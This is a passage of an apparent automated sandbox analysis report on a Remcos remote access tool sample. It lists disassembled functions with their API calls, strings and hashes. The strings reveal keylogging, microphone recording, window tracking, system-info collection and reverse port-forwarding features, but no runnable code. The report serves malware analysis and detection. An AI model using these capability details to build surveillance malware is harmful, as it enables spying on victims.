                                                  • _free.LIBCMT ref: 00446DDF
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                  • _free.LIBCMT ref: 00446DEB
                                                  • _free.LIBCMT ref: 00446DF6
                                                  • _free.LIBCMT ref: 00446E01
                                                  • _free.LIBCMT ref: 00446E0C
                                                  • _free.LIBCMT ref: 00446E17
                                                  • _free.LIBCMT ref: 00446E22
                                                  • _free.LIBCMT ref: 00446E2D
                                                  • _free.LIBCMT ref: 00446E38
                                                  • _free.LIBCMT ref: 00446E46
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                  • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                  • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                  • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                  Function 02137032 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 02137046
                                                    • Part of subcall function 02136D2C: HeapFree.KERNEL32(00000000,00000000,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?), ref: 02136D42
                                                    • Part of subcall function 02136D2C: GetLastError.KERNEL32(?,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?,?), ref: 02136D54
                                                  • _free.LIBCMT ref: 02137052
                                                  • _free.LIBCMT ref: 0213705D
                                                  • _free.LIBCMT ref: 02137068
                                                  • _free.LIBCMT ref: 02137073
                                                  • _free.LIBCMT ref: 0213707E
                                                  • _free.LIBCMT ref: 02137089
                                                  • _free.LIBCMT ref: 02137094
                                                  • _free.LIBCMT ref: 0213709F
                                                  • _free.LIBCMT ref: 021370AD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                  • Instruction ID: 6f71c6999dbd5474d9d2ab0d6bb1064a7f7dc97682c71175f44b2edee0ca7bca
                                                  • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                  • Instruction Fuzzy Hash: DA115D76540148BFCB42EFA5D841C993FBAAF05360B5190A5BA488F261DB33EE50DF88
                                                  Function 02101EE8 Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 479fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02101F01
                                                    • Part of subcall function 0210AD9F: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,020F3CA7), ref: 0210ADC6
                                                    • Part of subcall function 0210791D: CloseHandle.KERNEL32(020F3D20,?,?,020F3D20,00465324), ref: 02107933
                                                    • Part of subcall function 0210791D: CloseHandle.KERNEL32($SF,?,?,020F3D20,00465324), ref: 0210793C
                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 021021F8
                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 0210222F
                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 0210226B
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                  • String ID: HDG$HDG$>G$>G
                                                  • API String ID: 1937857116-1666402509
                                                  • Opcode ID: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                  • Instruction ID: 5b204cc2eacef3de9999a8264106d2bcc2cd21195162e62e13f69c3be7b60818
                                                  • Opcode Fuzzy Hash: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                  • Instruction Fuzzy Hash: CA0246312883414FD3A9FB60D8A0BEF73D6AFD4300F50482DEA8A46995EF705A49DF56
                                                  Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Eventinet_ntoa
                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                  • API String ID: 3578746661-4192532303
                                                  • Opcode ID: da4141fd40dea034988e8bac021007fe1b9853023a15964e36e684bacbed286c
                                                  • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                  • Opcode Fuzzy Hash: da4141fd40dea034988e8bac021007fe1b9853023a15964e36e684bacbed286c
                                                  • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                  Function 0210057B Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Eventinet_ntoa
                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                  • API String ID: 3578746661-4192532303
                                                  • Opcode ID: a05e0ddbe8dc3814f036cc210c9733109e43822c73ea3fc4ff0ab9c9ada38e94
                                                  • Instruction ID: 12af8005f34c455253ae226c2143434232bccb9c1c7136d168a635efef878c1a
                                                  • Opcode Fuzzy Hash: a05e0ddbe8dc3814f036cc210c9733109e43822c73ea3fc4ff0ab9c9ada38e94
                                                  • Instruction Fuzzy Hash: 2C510831A843509FC754F738D8997BE36A6AF84300F410529E94A87AE0EF74AD45DFC6
                                                  Function 0210A422 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 180synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0210A519
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0210A555
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000), ref: 0210A566
                                                  • SetEvent.KERNEL32 ref: 0210A5F1
                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0210A602
                                                  • CloseHandle.KERNEL32 ref: 0210A612
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$CloseCreateExistsFileHandleObjectPathSendSingleStringWait
                                                  • String ID: TUF$open "
                                                  • API String ID: 1811012380-2979349893
                                                  • Opcode ID: afa000e900512d794b59872f8fe6b6e7421b33da501b9bd85e28326864c8fc87
                                                  • Instruction ID: 4cf60a87e7bc85a389d11d70e9257b6a53c73fed0d9a0ef7f77bafa13ccbd862
                                                  • Opcode Fuzzy Hash: afa000e900512d794b59872f8fe6b6e7421b33da501b9bd85e28326864c8fc87
                                                  • Instruction Fuzzy Hash: 9C51C1712843046ED254FB30EC91EBF3B6EEF84744F10003AFA55969E5EF609D48DAA6
                                                  Function 020FA65B Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 158sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 020FA6BD
                                                  • Sleep.KERNEL32(000001F4), ref: 020FA6C8
                                                  • GetForegroundWindow.USER32 ref: 020FA6CE
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 020FA6D7
                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 020FA70B
                                                  • Sleep.KERNEL32(000003E8), ref: 020FA7DB
                                                    • Part of subcall function 020F9FBF: SetEvent.KERNEL32(00000000,?,00000000,020FAB83,00000000), ref: 020F9FEB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                  • String ID: [${ User has been idle for
                                                  • API String ID: 911427763-3934435721
                                                  • Opcode ID: 6d776f70f920023e5288755160ba8f24f5da9fa6db96a00e1421ea32c0579234
                                                  • Instruction ID: ff12954b4fd90bf1761cd49333c1d53d6e5540bda6564c91945ce8b3f8f8f055
                                                  • Opcode Fuzzy Hash: 6d776f70f920023e5288755160ba8f24f5da9fa6db96a00e1421ea32c0579234
                                                  • Instruction Fuzzy Hash: BC51F5317883005FC395FB20C894FAE77E6AB84714F10456DFA4A86AD0DF64AA05DE56
                                                  Function 00455139 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlDecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DecodePointer
                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                  • API String ID: 3527080286-3064271455
                                                  • Opcode ID: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                  • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                  • Opcode Fuzzy Hash: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                  • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                  Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                  • Sleep.KERNEL32(00000064), ref: 00416688
                                                  • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                  • API String ID: 1462127192-2001430897
                                                  • Opcode ID: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                  • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                  • Opcode Fuzzy Hash: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                  • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                  Function 0210708B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 102filesynchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 0210718B
                                                  • CloseHandle.KERNEL32(00000000), ref: 02107194
                                                  • DeleteFileA.KERNEL32(00000000), ref: 021071A3
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 02107157
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                  • String ID: <$@$@FG$TUF
                                                  • API String ID: 1107811701-3349172182
                                                  • Opcode ID: b36bc87eb4507af4992a544fbd13103342267bc18c2cc7e8b00c7cda52f17d37
                                                  • Instruction ID: 2ab6b40b45e3c8af491b29a4f89a074ae5c31ab33457135fdf2d0c5a1d9f58ac
                                                  • Opcode Fuzzy Hash: b36bc87eb4507af4992a544fbd13103342267bc18c2cc7e8b00c7cda52f17d37
                                                  • Instruction Fuzzy Hash: 51319D31A802099FDB55FBA0DC95AEEB736AF50300F004168FB06664E4EF745E8ADF94
                                                  Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _strftime.LIBCMT ref: 00401AD3
                                                    • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                  • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                  • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                  • API String ID: 3809562944-3643129801
                                                  • Opcode ID: 4eae73abab5cec10745b217a761eb3c0bf0d0a7b5b73b4b46abcecbfa30289f5
                                                  • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                  • Opcode Fuzzy Hash: 4eae73abab5cec10745b217a761eb3c0bf0d0a7b5b73b4b46abcecbfa30289f5
                                                  • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                  Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                  • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                  • waveInStart.WINMM ref: 00401A81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                  • String ID: XCG$`=G$x=G
                                                  • API String ID: 1356121797-903574159
                                                  • Opcode ID: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                  • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                  • Opcode Fuzzy Hash: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                  • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                  Function 020F1BD2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 020F1BE2
                                                  • waveInOpen.WINMM(00471AF8,000000FF,00471B00,00401A8E,00000000,00000000,00000024), ref: 020F1C78
                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 020F1CCD
                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 020F1CDC
                                                  • waveInStart.WINMM ref: 020F1CE8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                  • String ID: XCG$`=G$x=G
                                                  • API String ID: 1356121797-903574159
                                                  • Opcode ID: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                  • Instruction ID: b848b48b1c6d0282bf375aa3a3cebaae720ce9a29fbc9ae75d2346a70c58adaa
                                                  • Opcode Fuzzy Hash: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                  • Instruction Fuzzy Hash: A72171316413019BC714DF7DBD1595A7BAAFB84741B00843AF11DD76B4EBB49885DB0C
                                                  Function 020F9C4B Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 020F9C68
                                                  • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 020F9C76
                                                  • GetLastError.KERNEL32 ref: 020F9C82
                                                    • Part of subcall function 0210A8ED: GetLocalTime.KERNEL32(00000000), ref: 0210A907
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 020F9CD2
                                                  • TranslateMessage.USER32(?), ref: 020F9CE1
                                                  • DispatchMessageA.USER32(?), ref: 020F9CEC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                  • String ID: Keylogger initialization failure: error $`#v
                                                  • API String ID: 3219506041-3226811161
                                                  • Opcode ID: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                  • Instruction ID: 99486037b22bc40ab56123223bde10b7bb31a35dbede0d0bb2bf64f4831899a1
                                                  • Opcode Fuzzy Hash: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                  • Instruction Fuzzy Hash: 2B1123716843049FC390BB79AC49E6B77ECAB94B12B00057EFE46C2250FB20D500EBA6
                                                  Function 0041C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                    • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                    • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                    • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                  • lstrcpyn.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                  • Shell_NotifyIcon.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                  • TranslateMessage.USER32(?), ref: 0041C9FB
                                                  • DispatchMessageA.USER32(?), ref: 0041CA05
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                  • String ID: Remcos
                                                  • API String ID: 1970332568-165870891
                                                  • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                  • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                  • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                  • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                  Function 0044B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                  • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                  • Opcode Fuzzy Hash: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                  • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                  Function 0213B6B7 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b50f87e948356266a42ac280b2451f101745a062afa0556d4abdae292072cfe6
                                                  • Instruction ID: 7c16236cc116070ff7a16f49bffe2abb32d9cba2bbf9b8f4424a079c2c7cd164
                                                  • Opcode Fuzzy Hash: b50f87e948356266a42ac280b2451f101745a062afa0556d4abdae292072cfe6
                                                  • Instruction Fuzzy Hash: 0AC1D5B1E88249AFDB12DFA8C841BADBBB7AF09318F044198E454A7391D7349A41CF61
                                                  Function 00452B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                  • __alloca_probe_16.LIBCMT ref: 00452C91
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                  • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                  • __freea.LIBCMT ref: 00452DAA
                                                  • __freea.LIBCMT ref: 00452DB6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                  • String ID:
                                                  • API String ID: 201697637-0
                                                  • Opcode ID: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                  • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                  • Opcode Fuzzy Hash: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                  • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
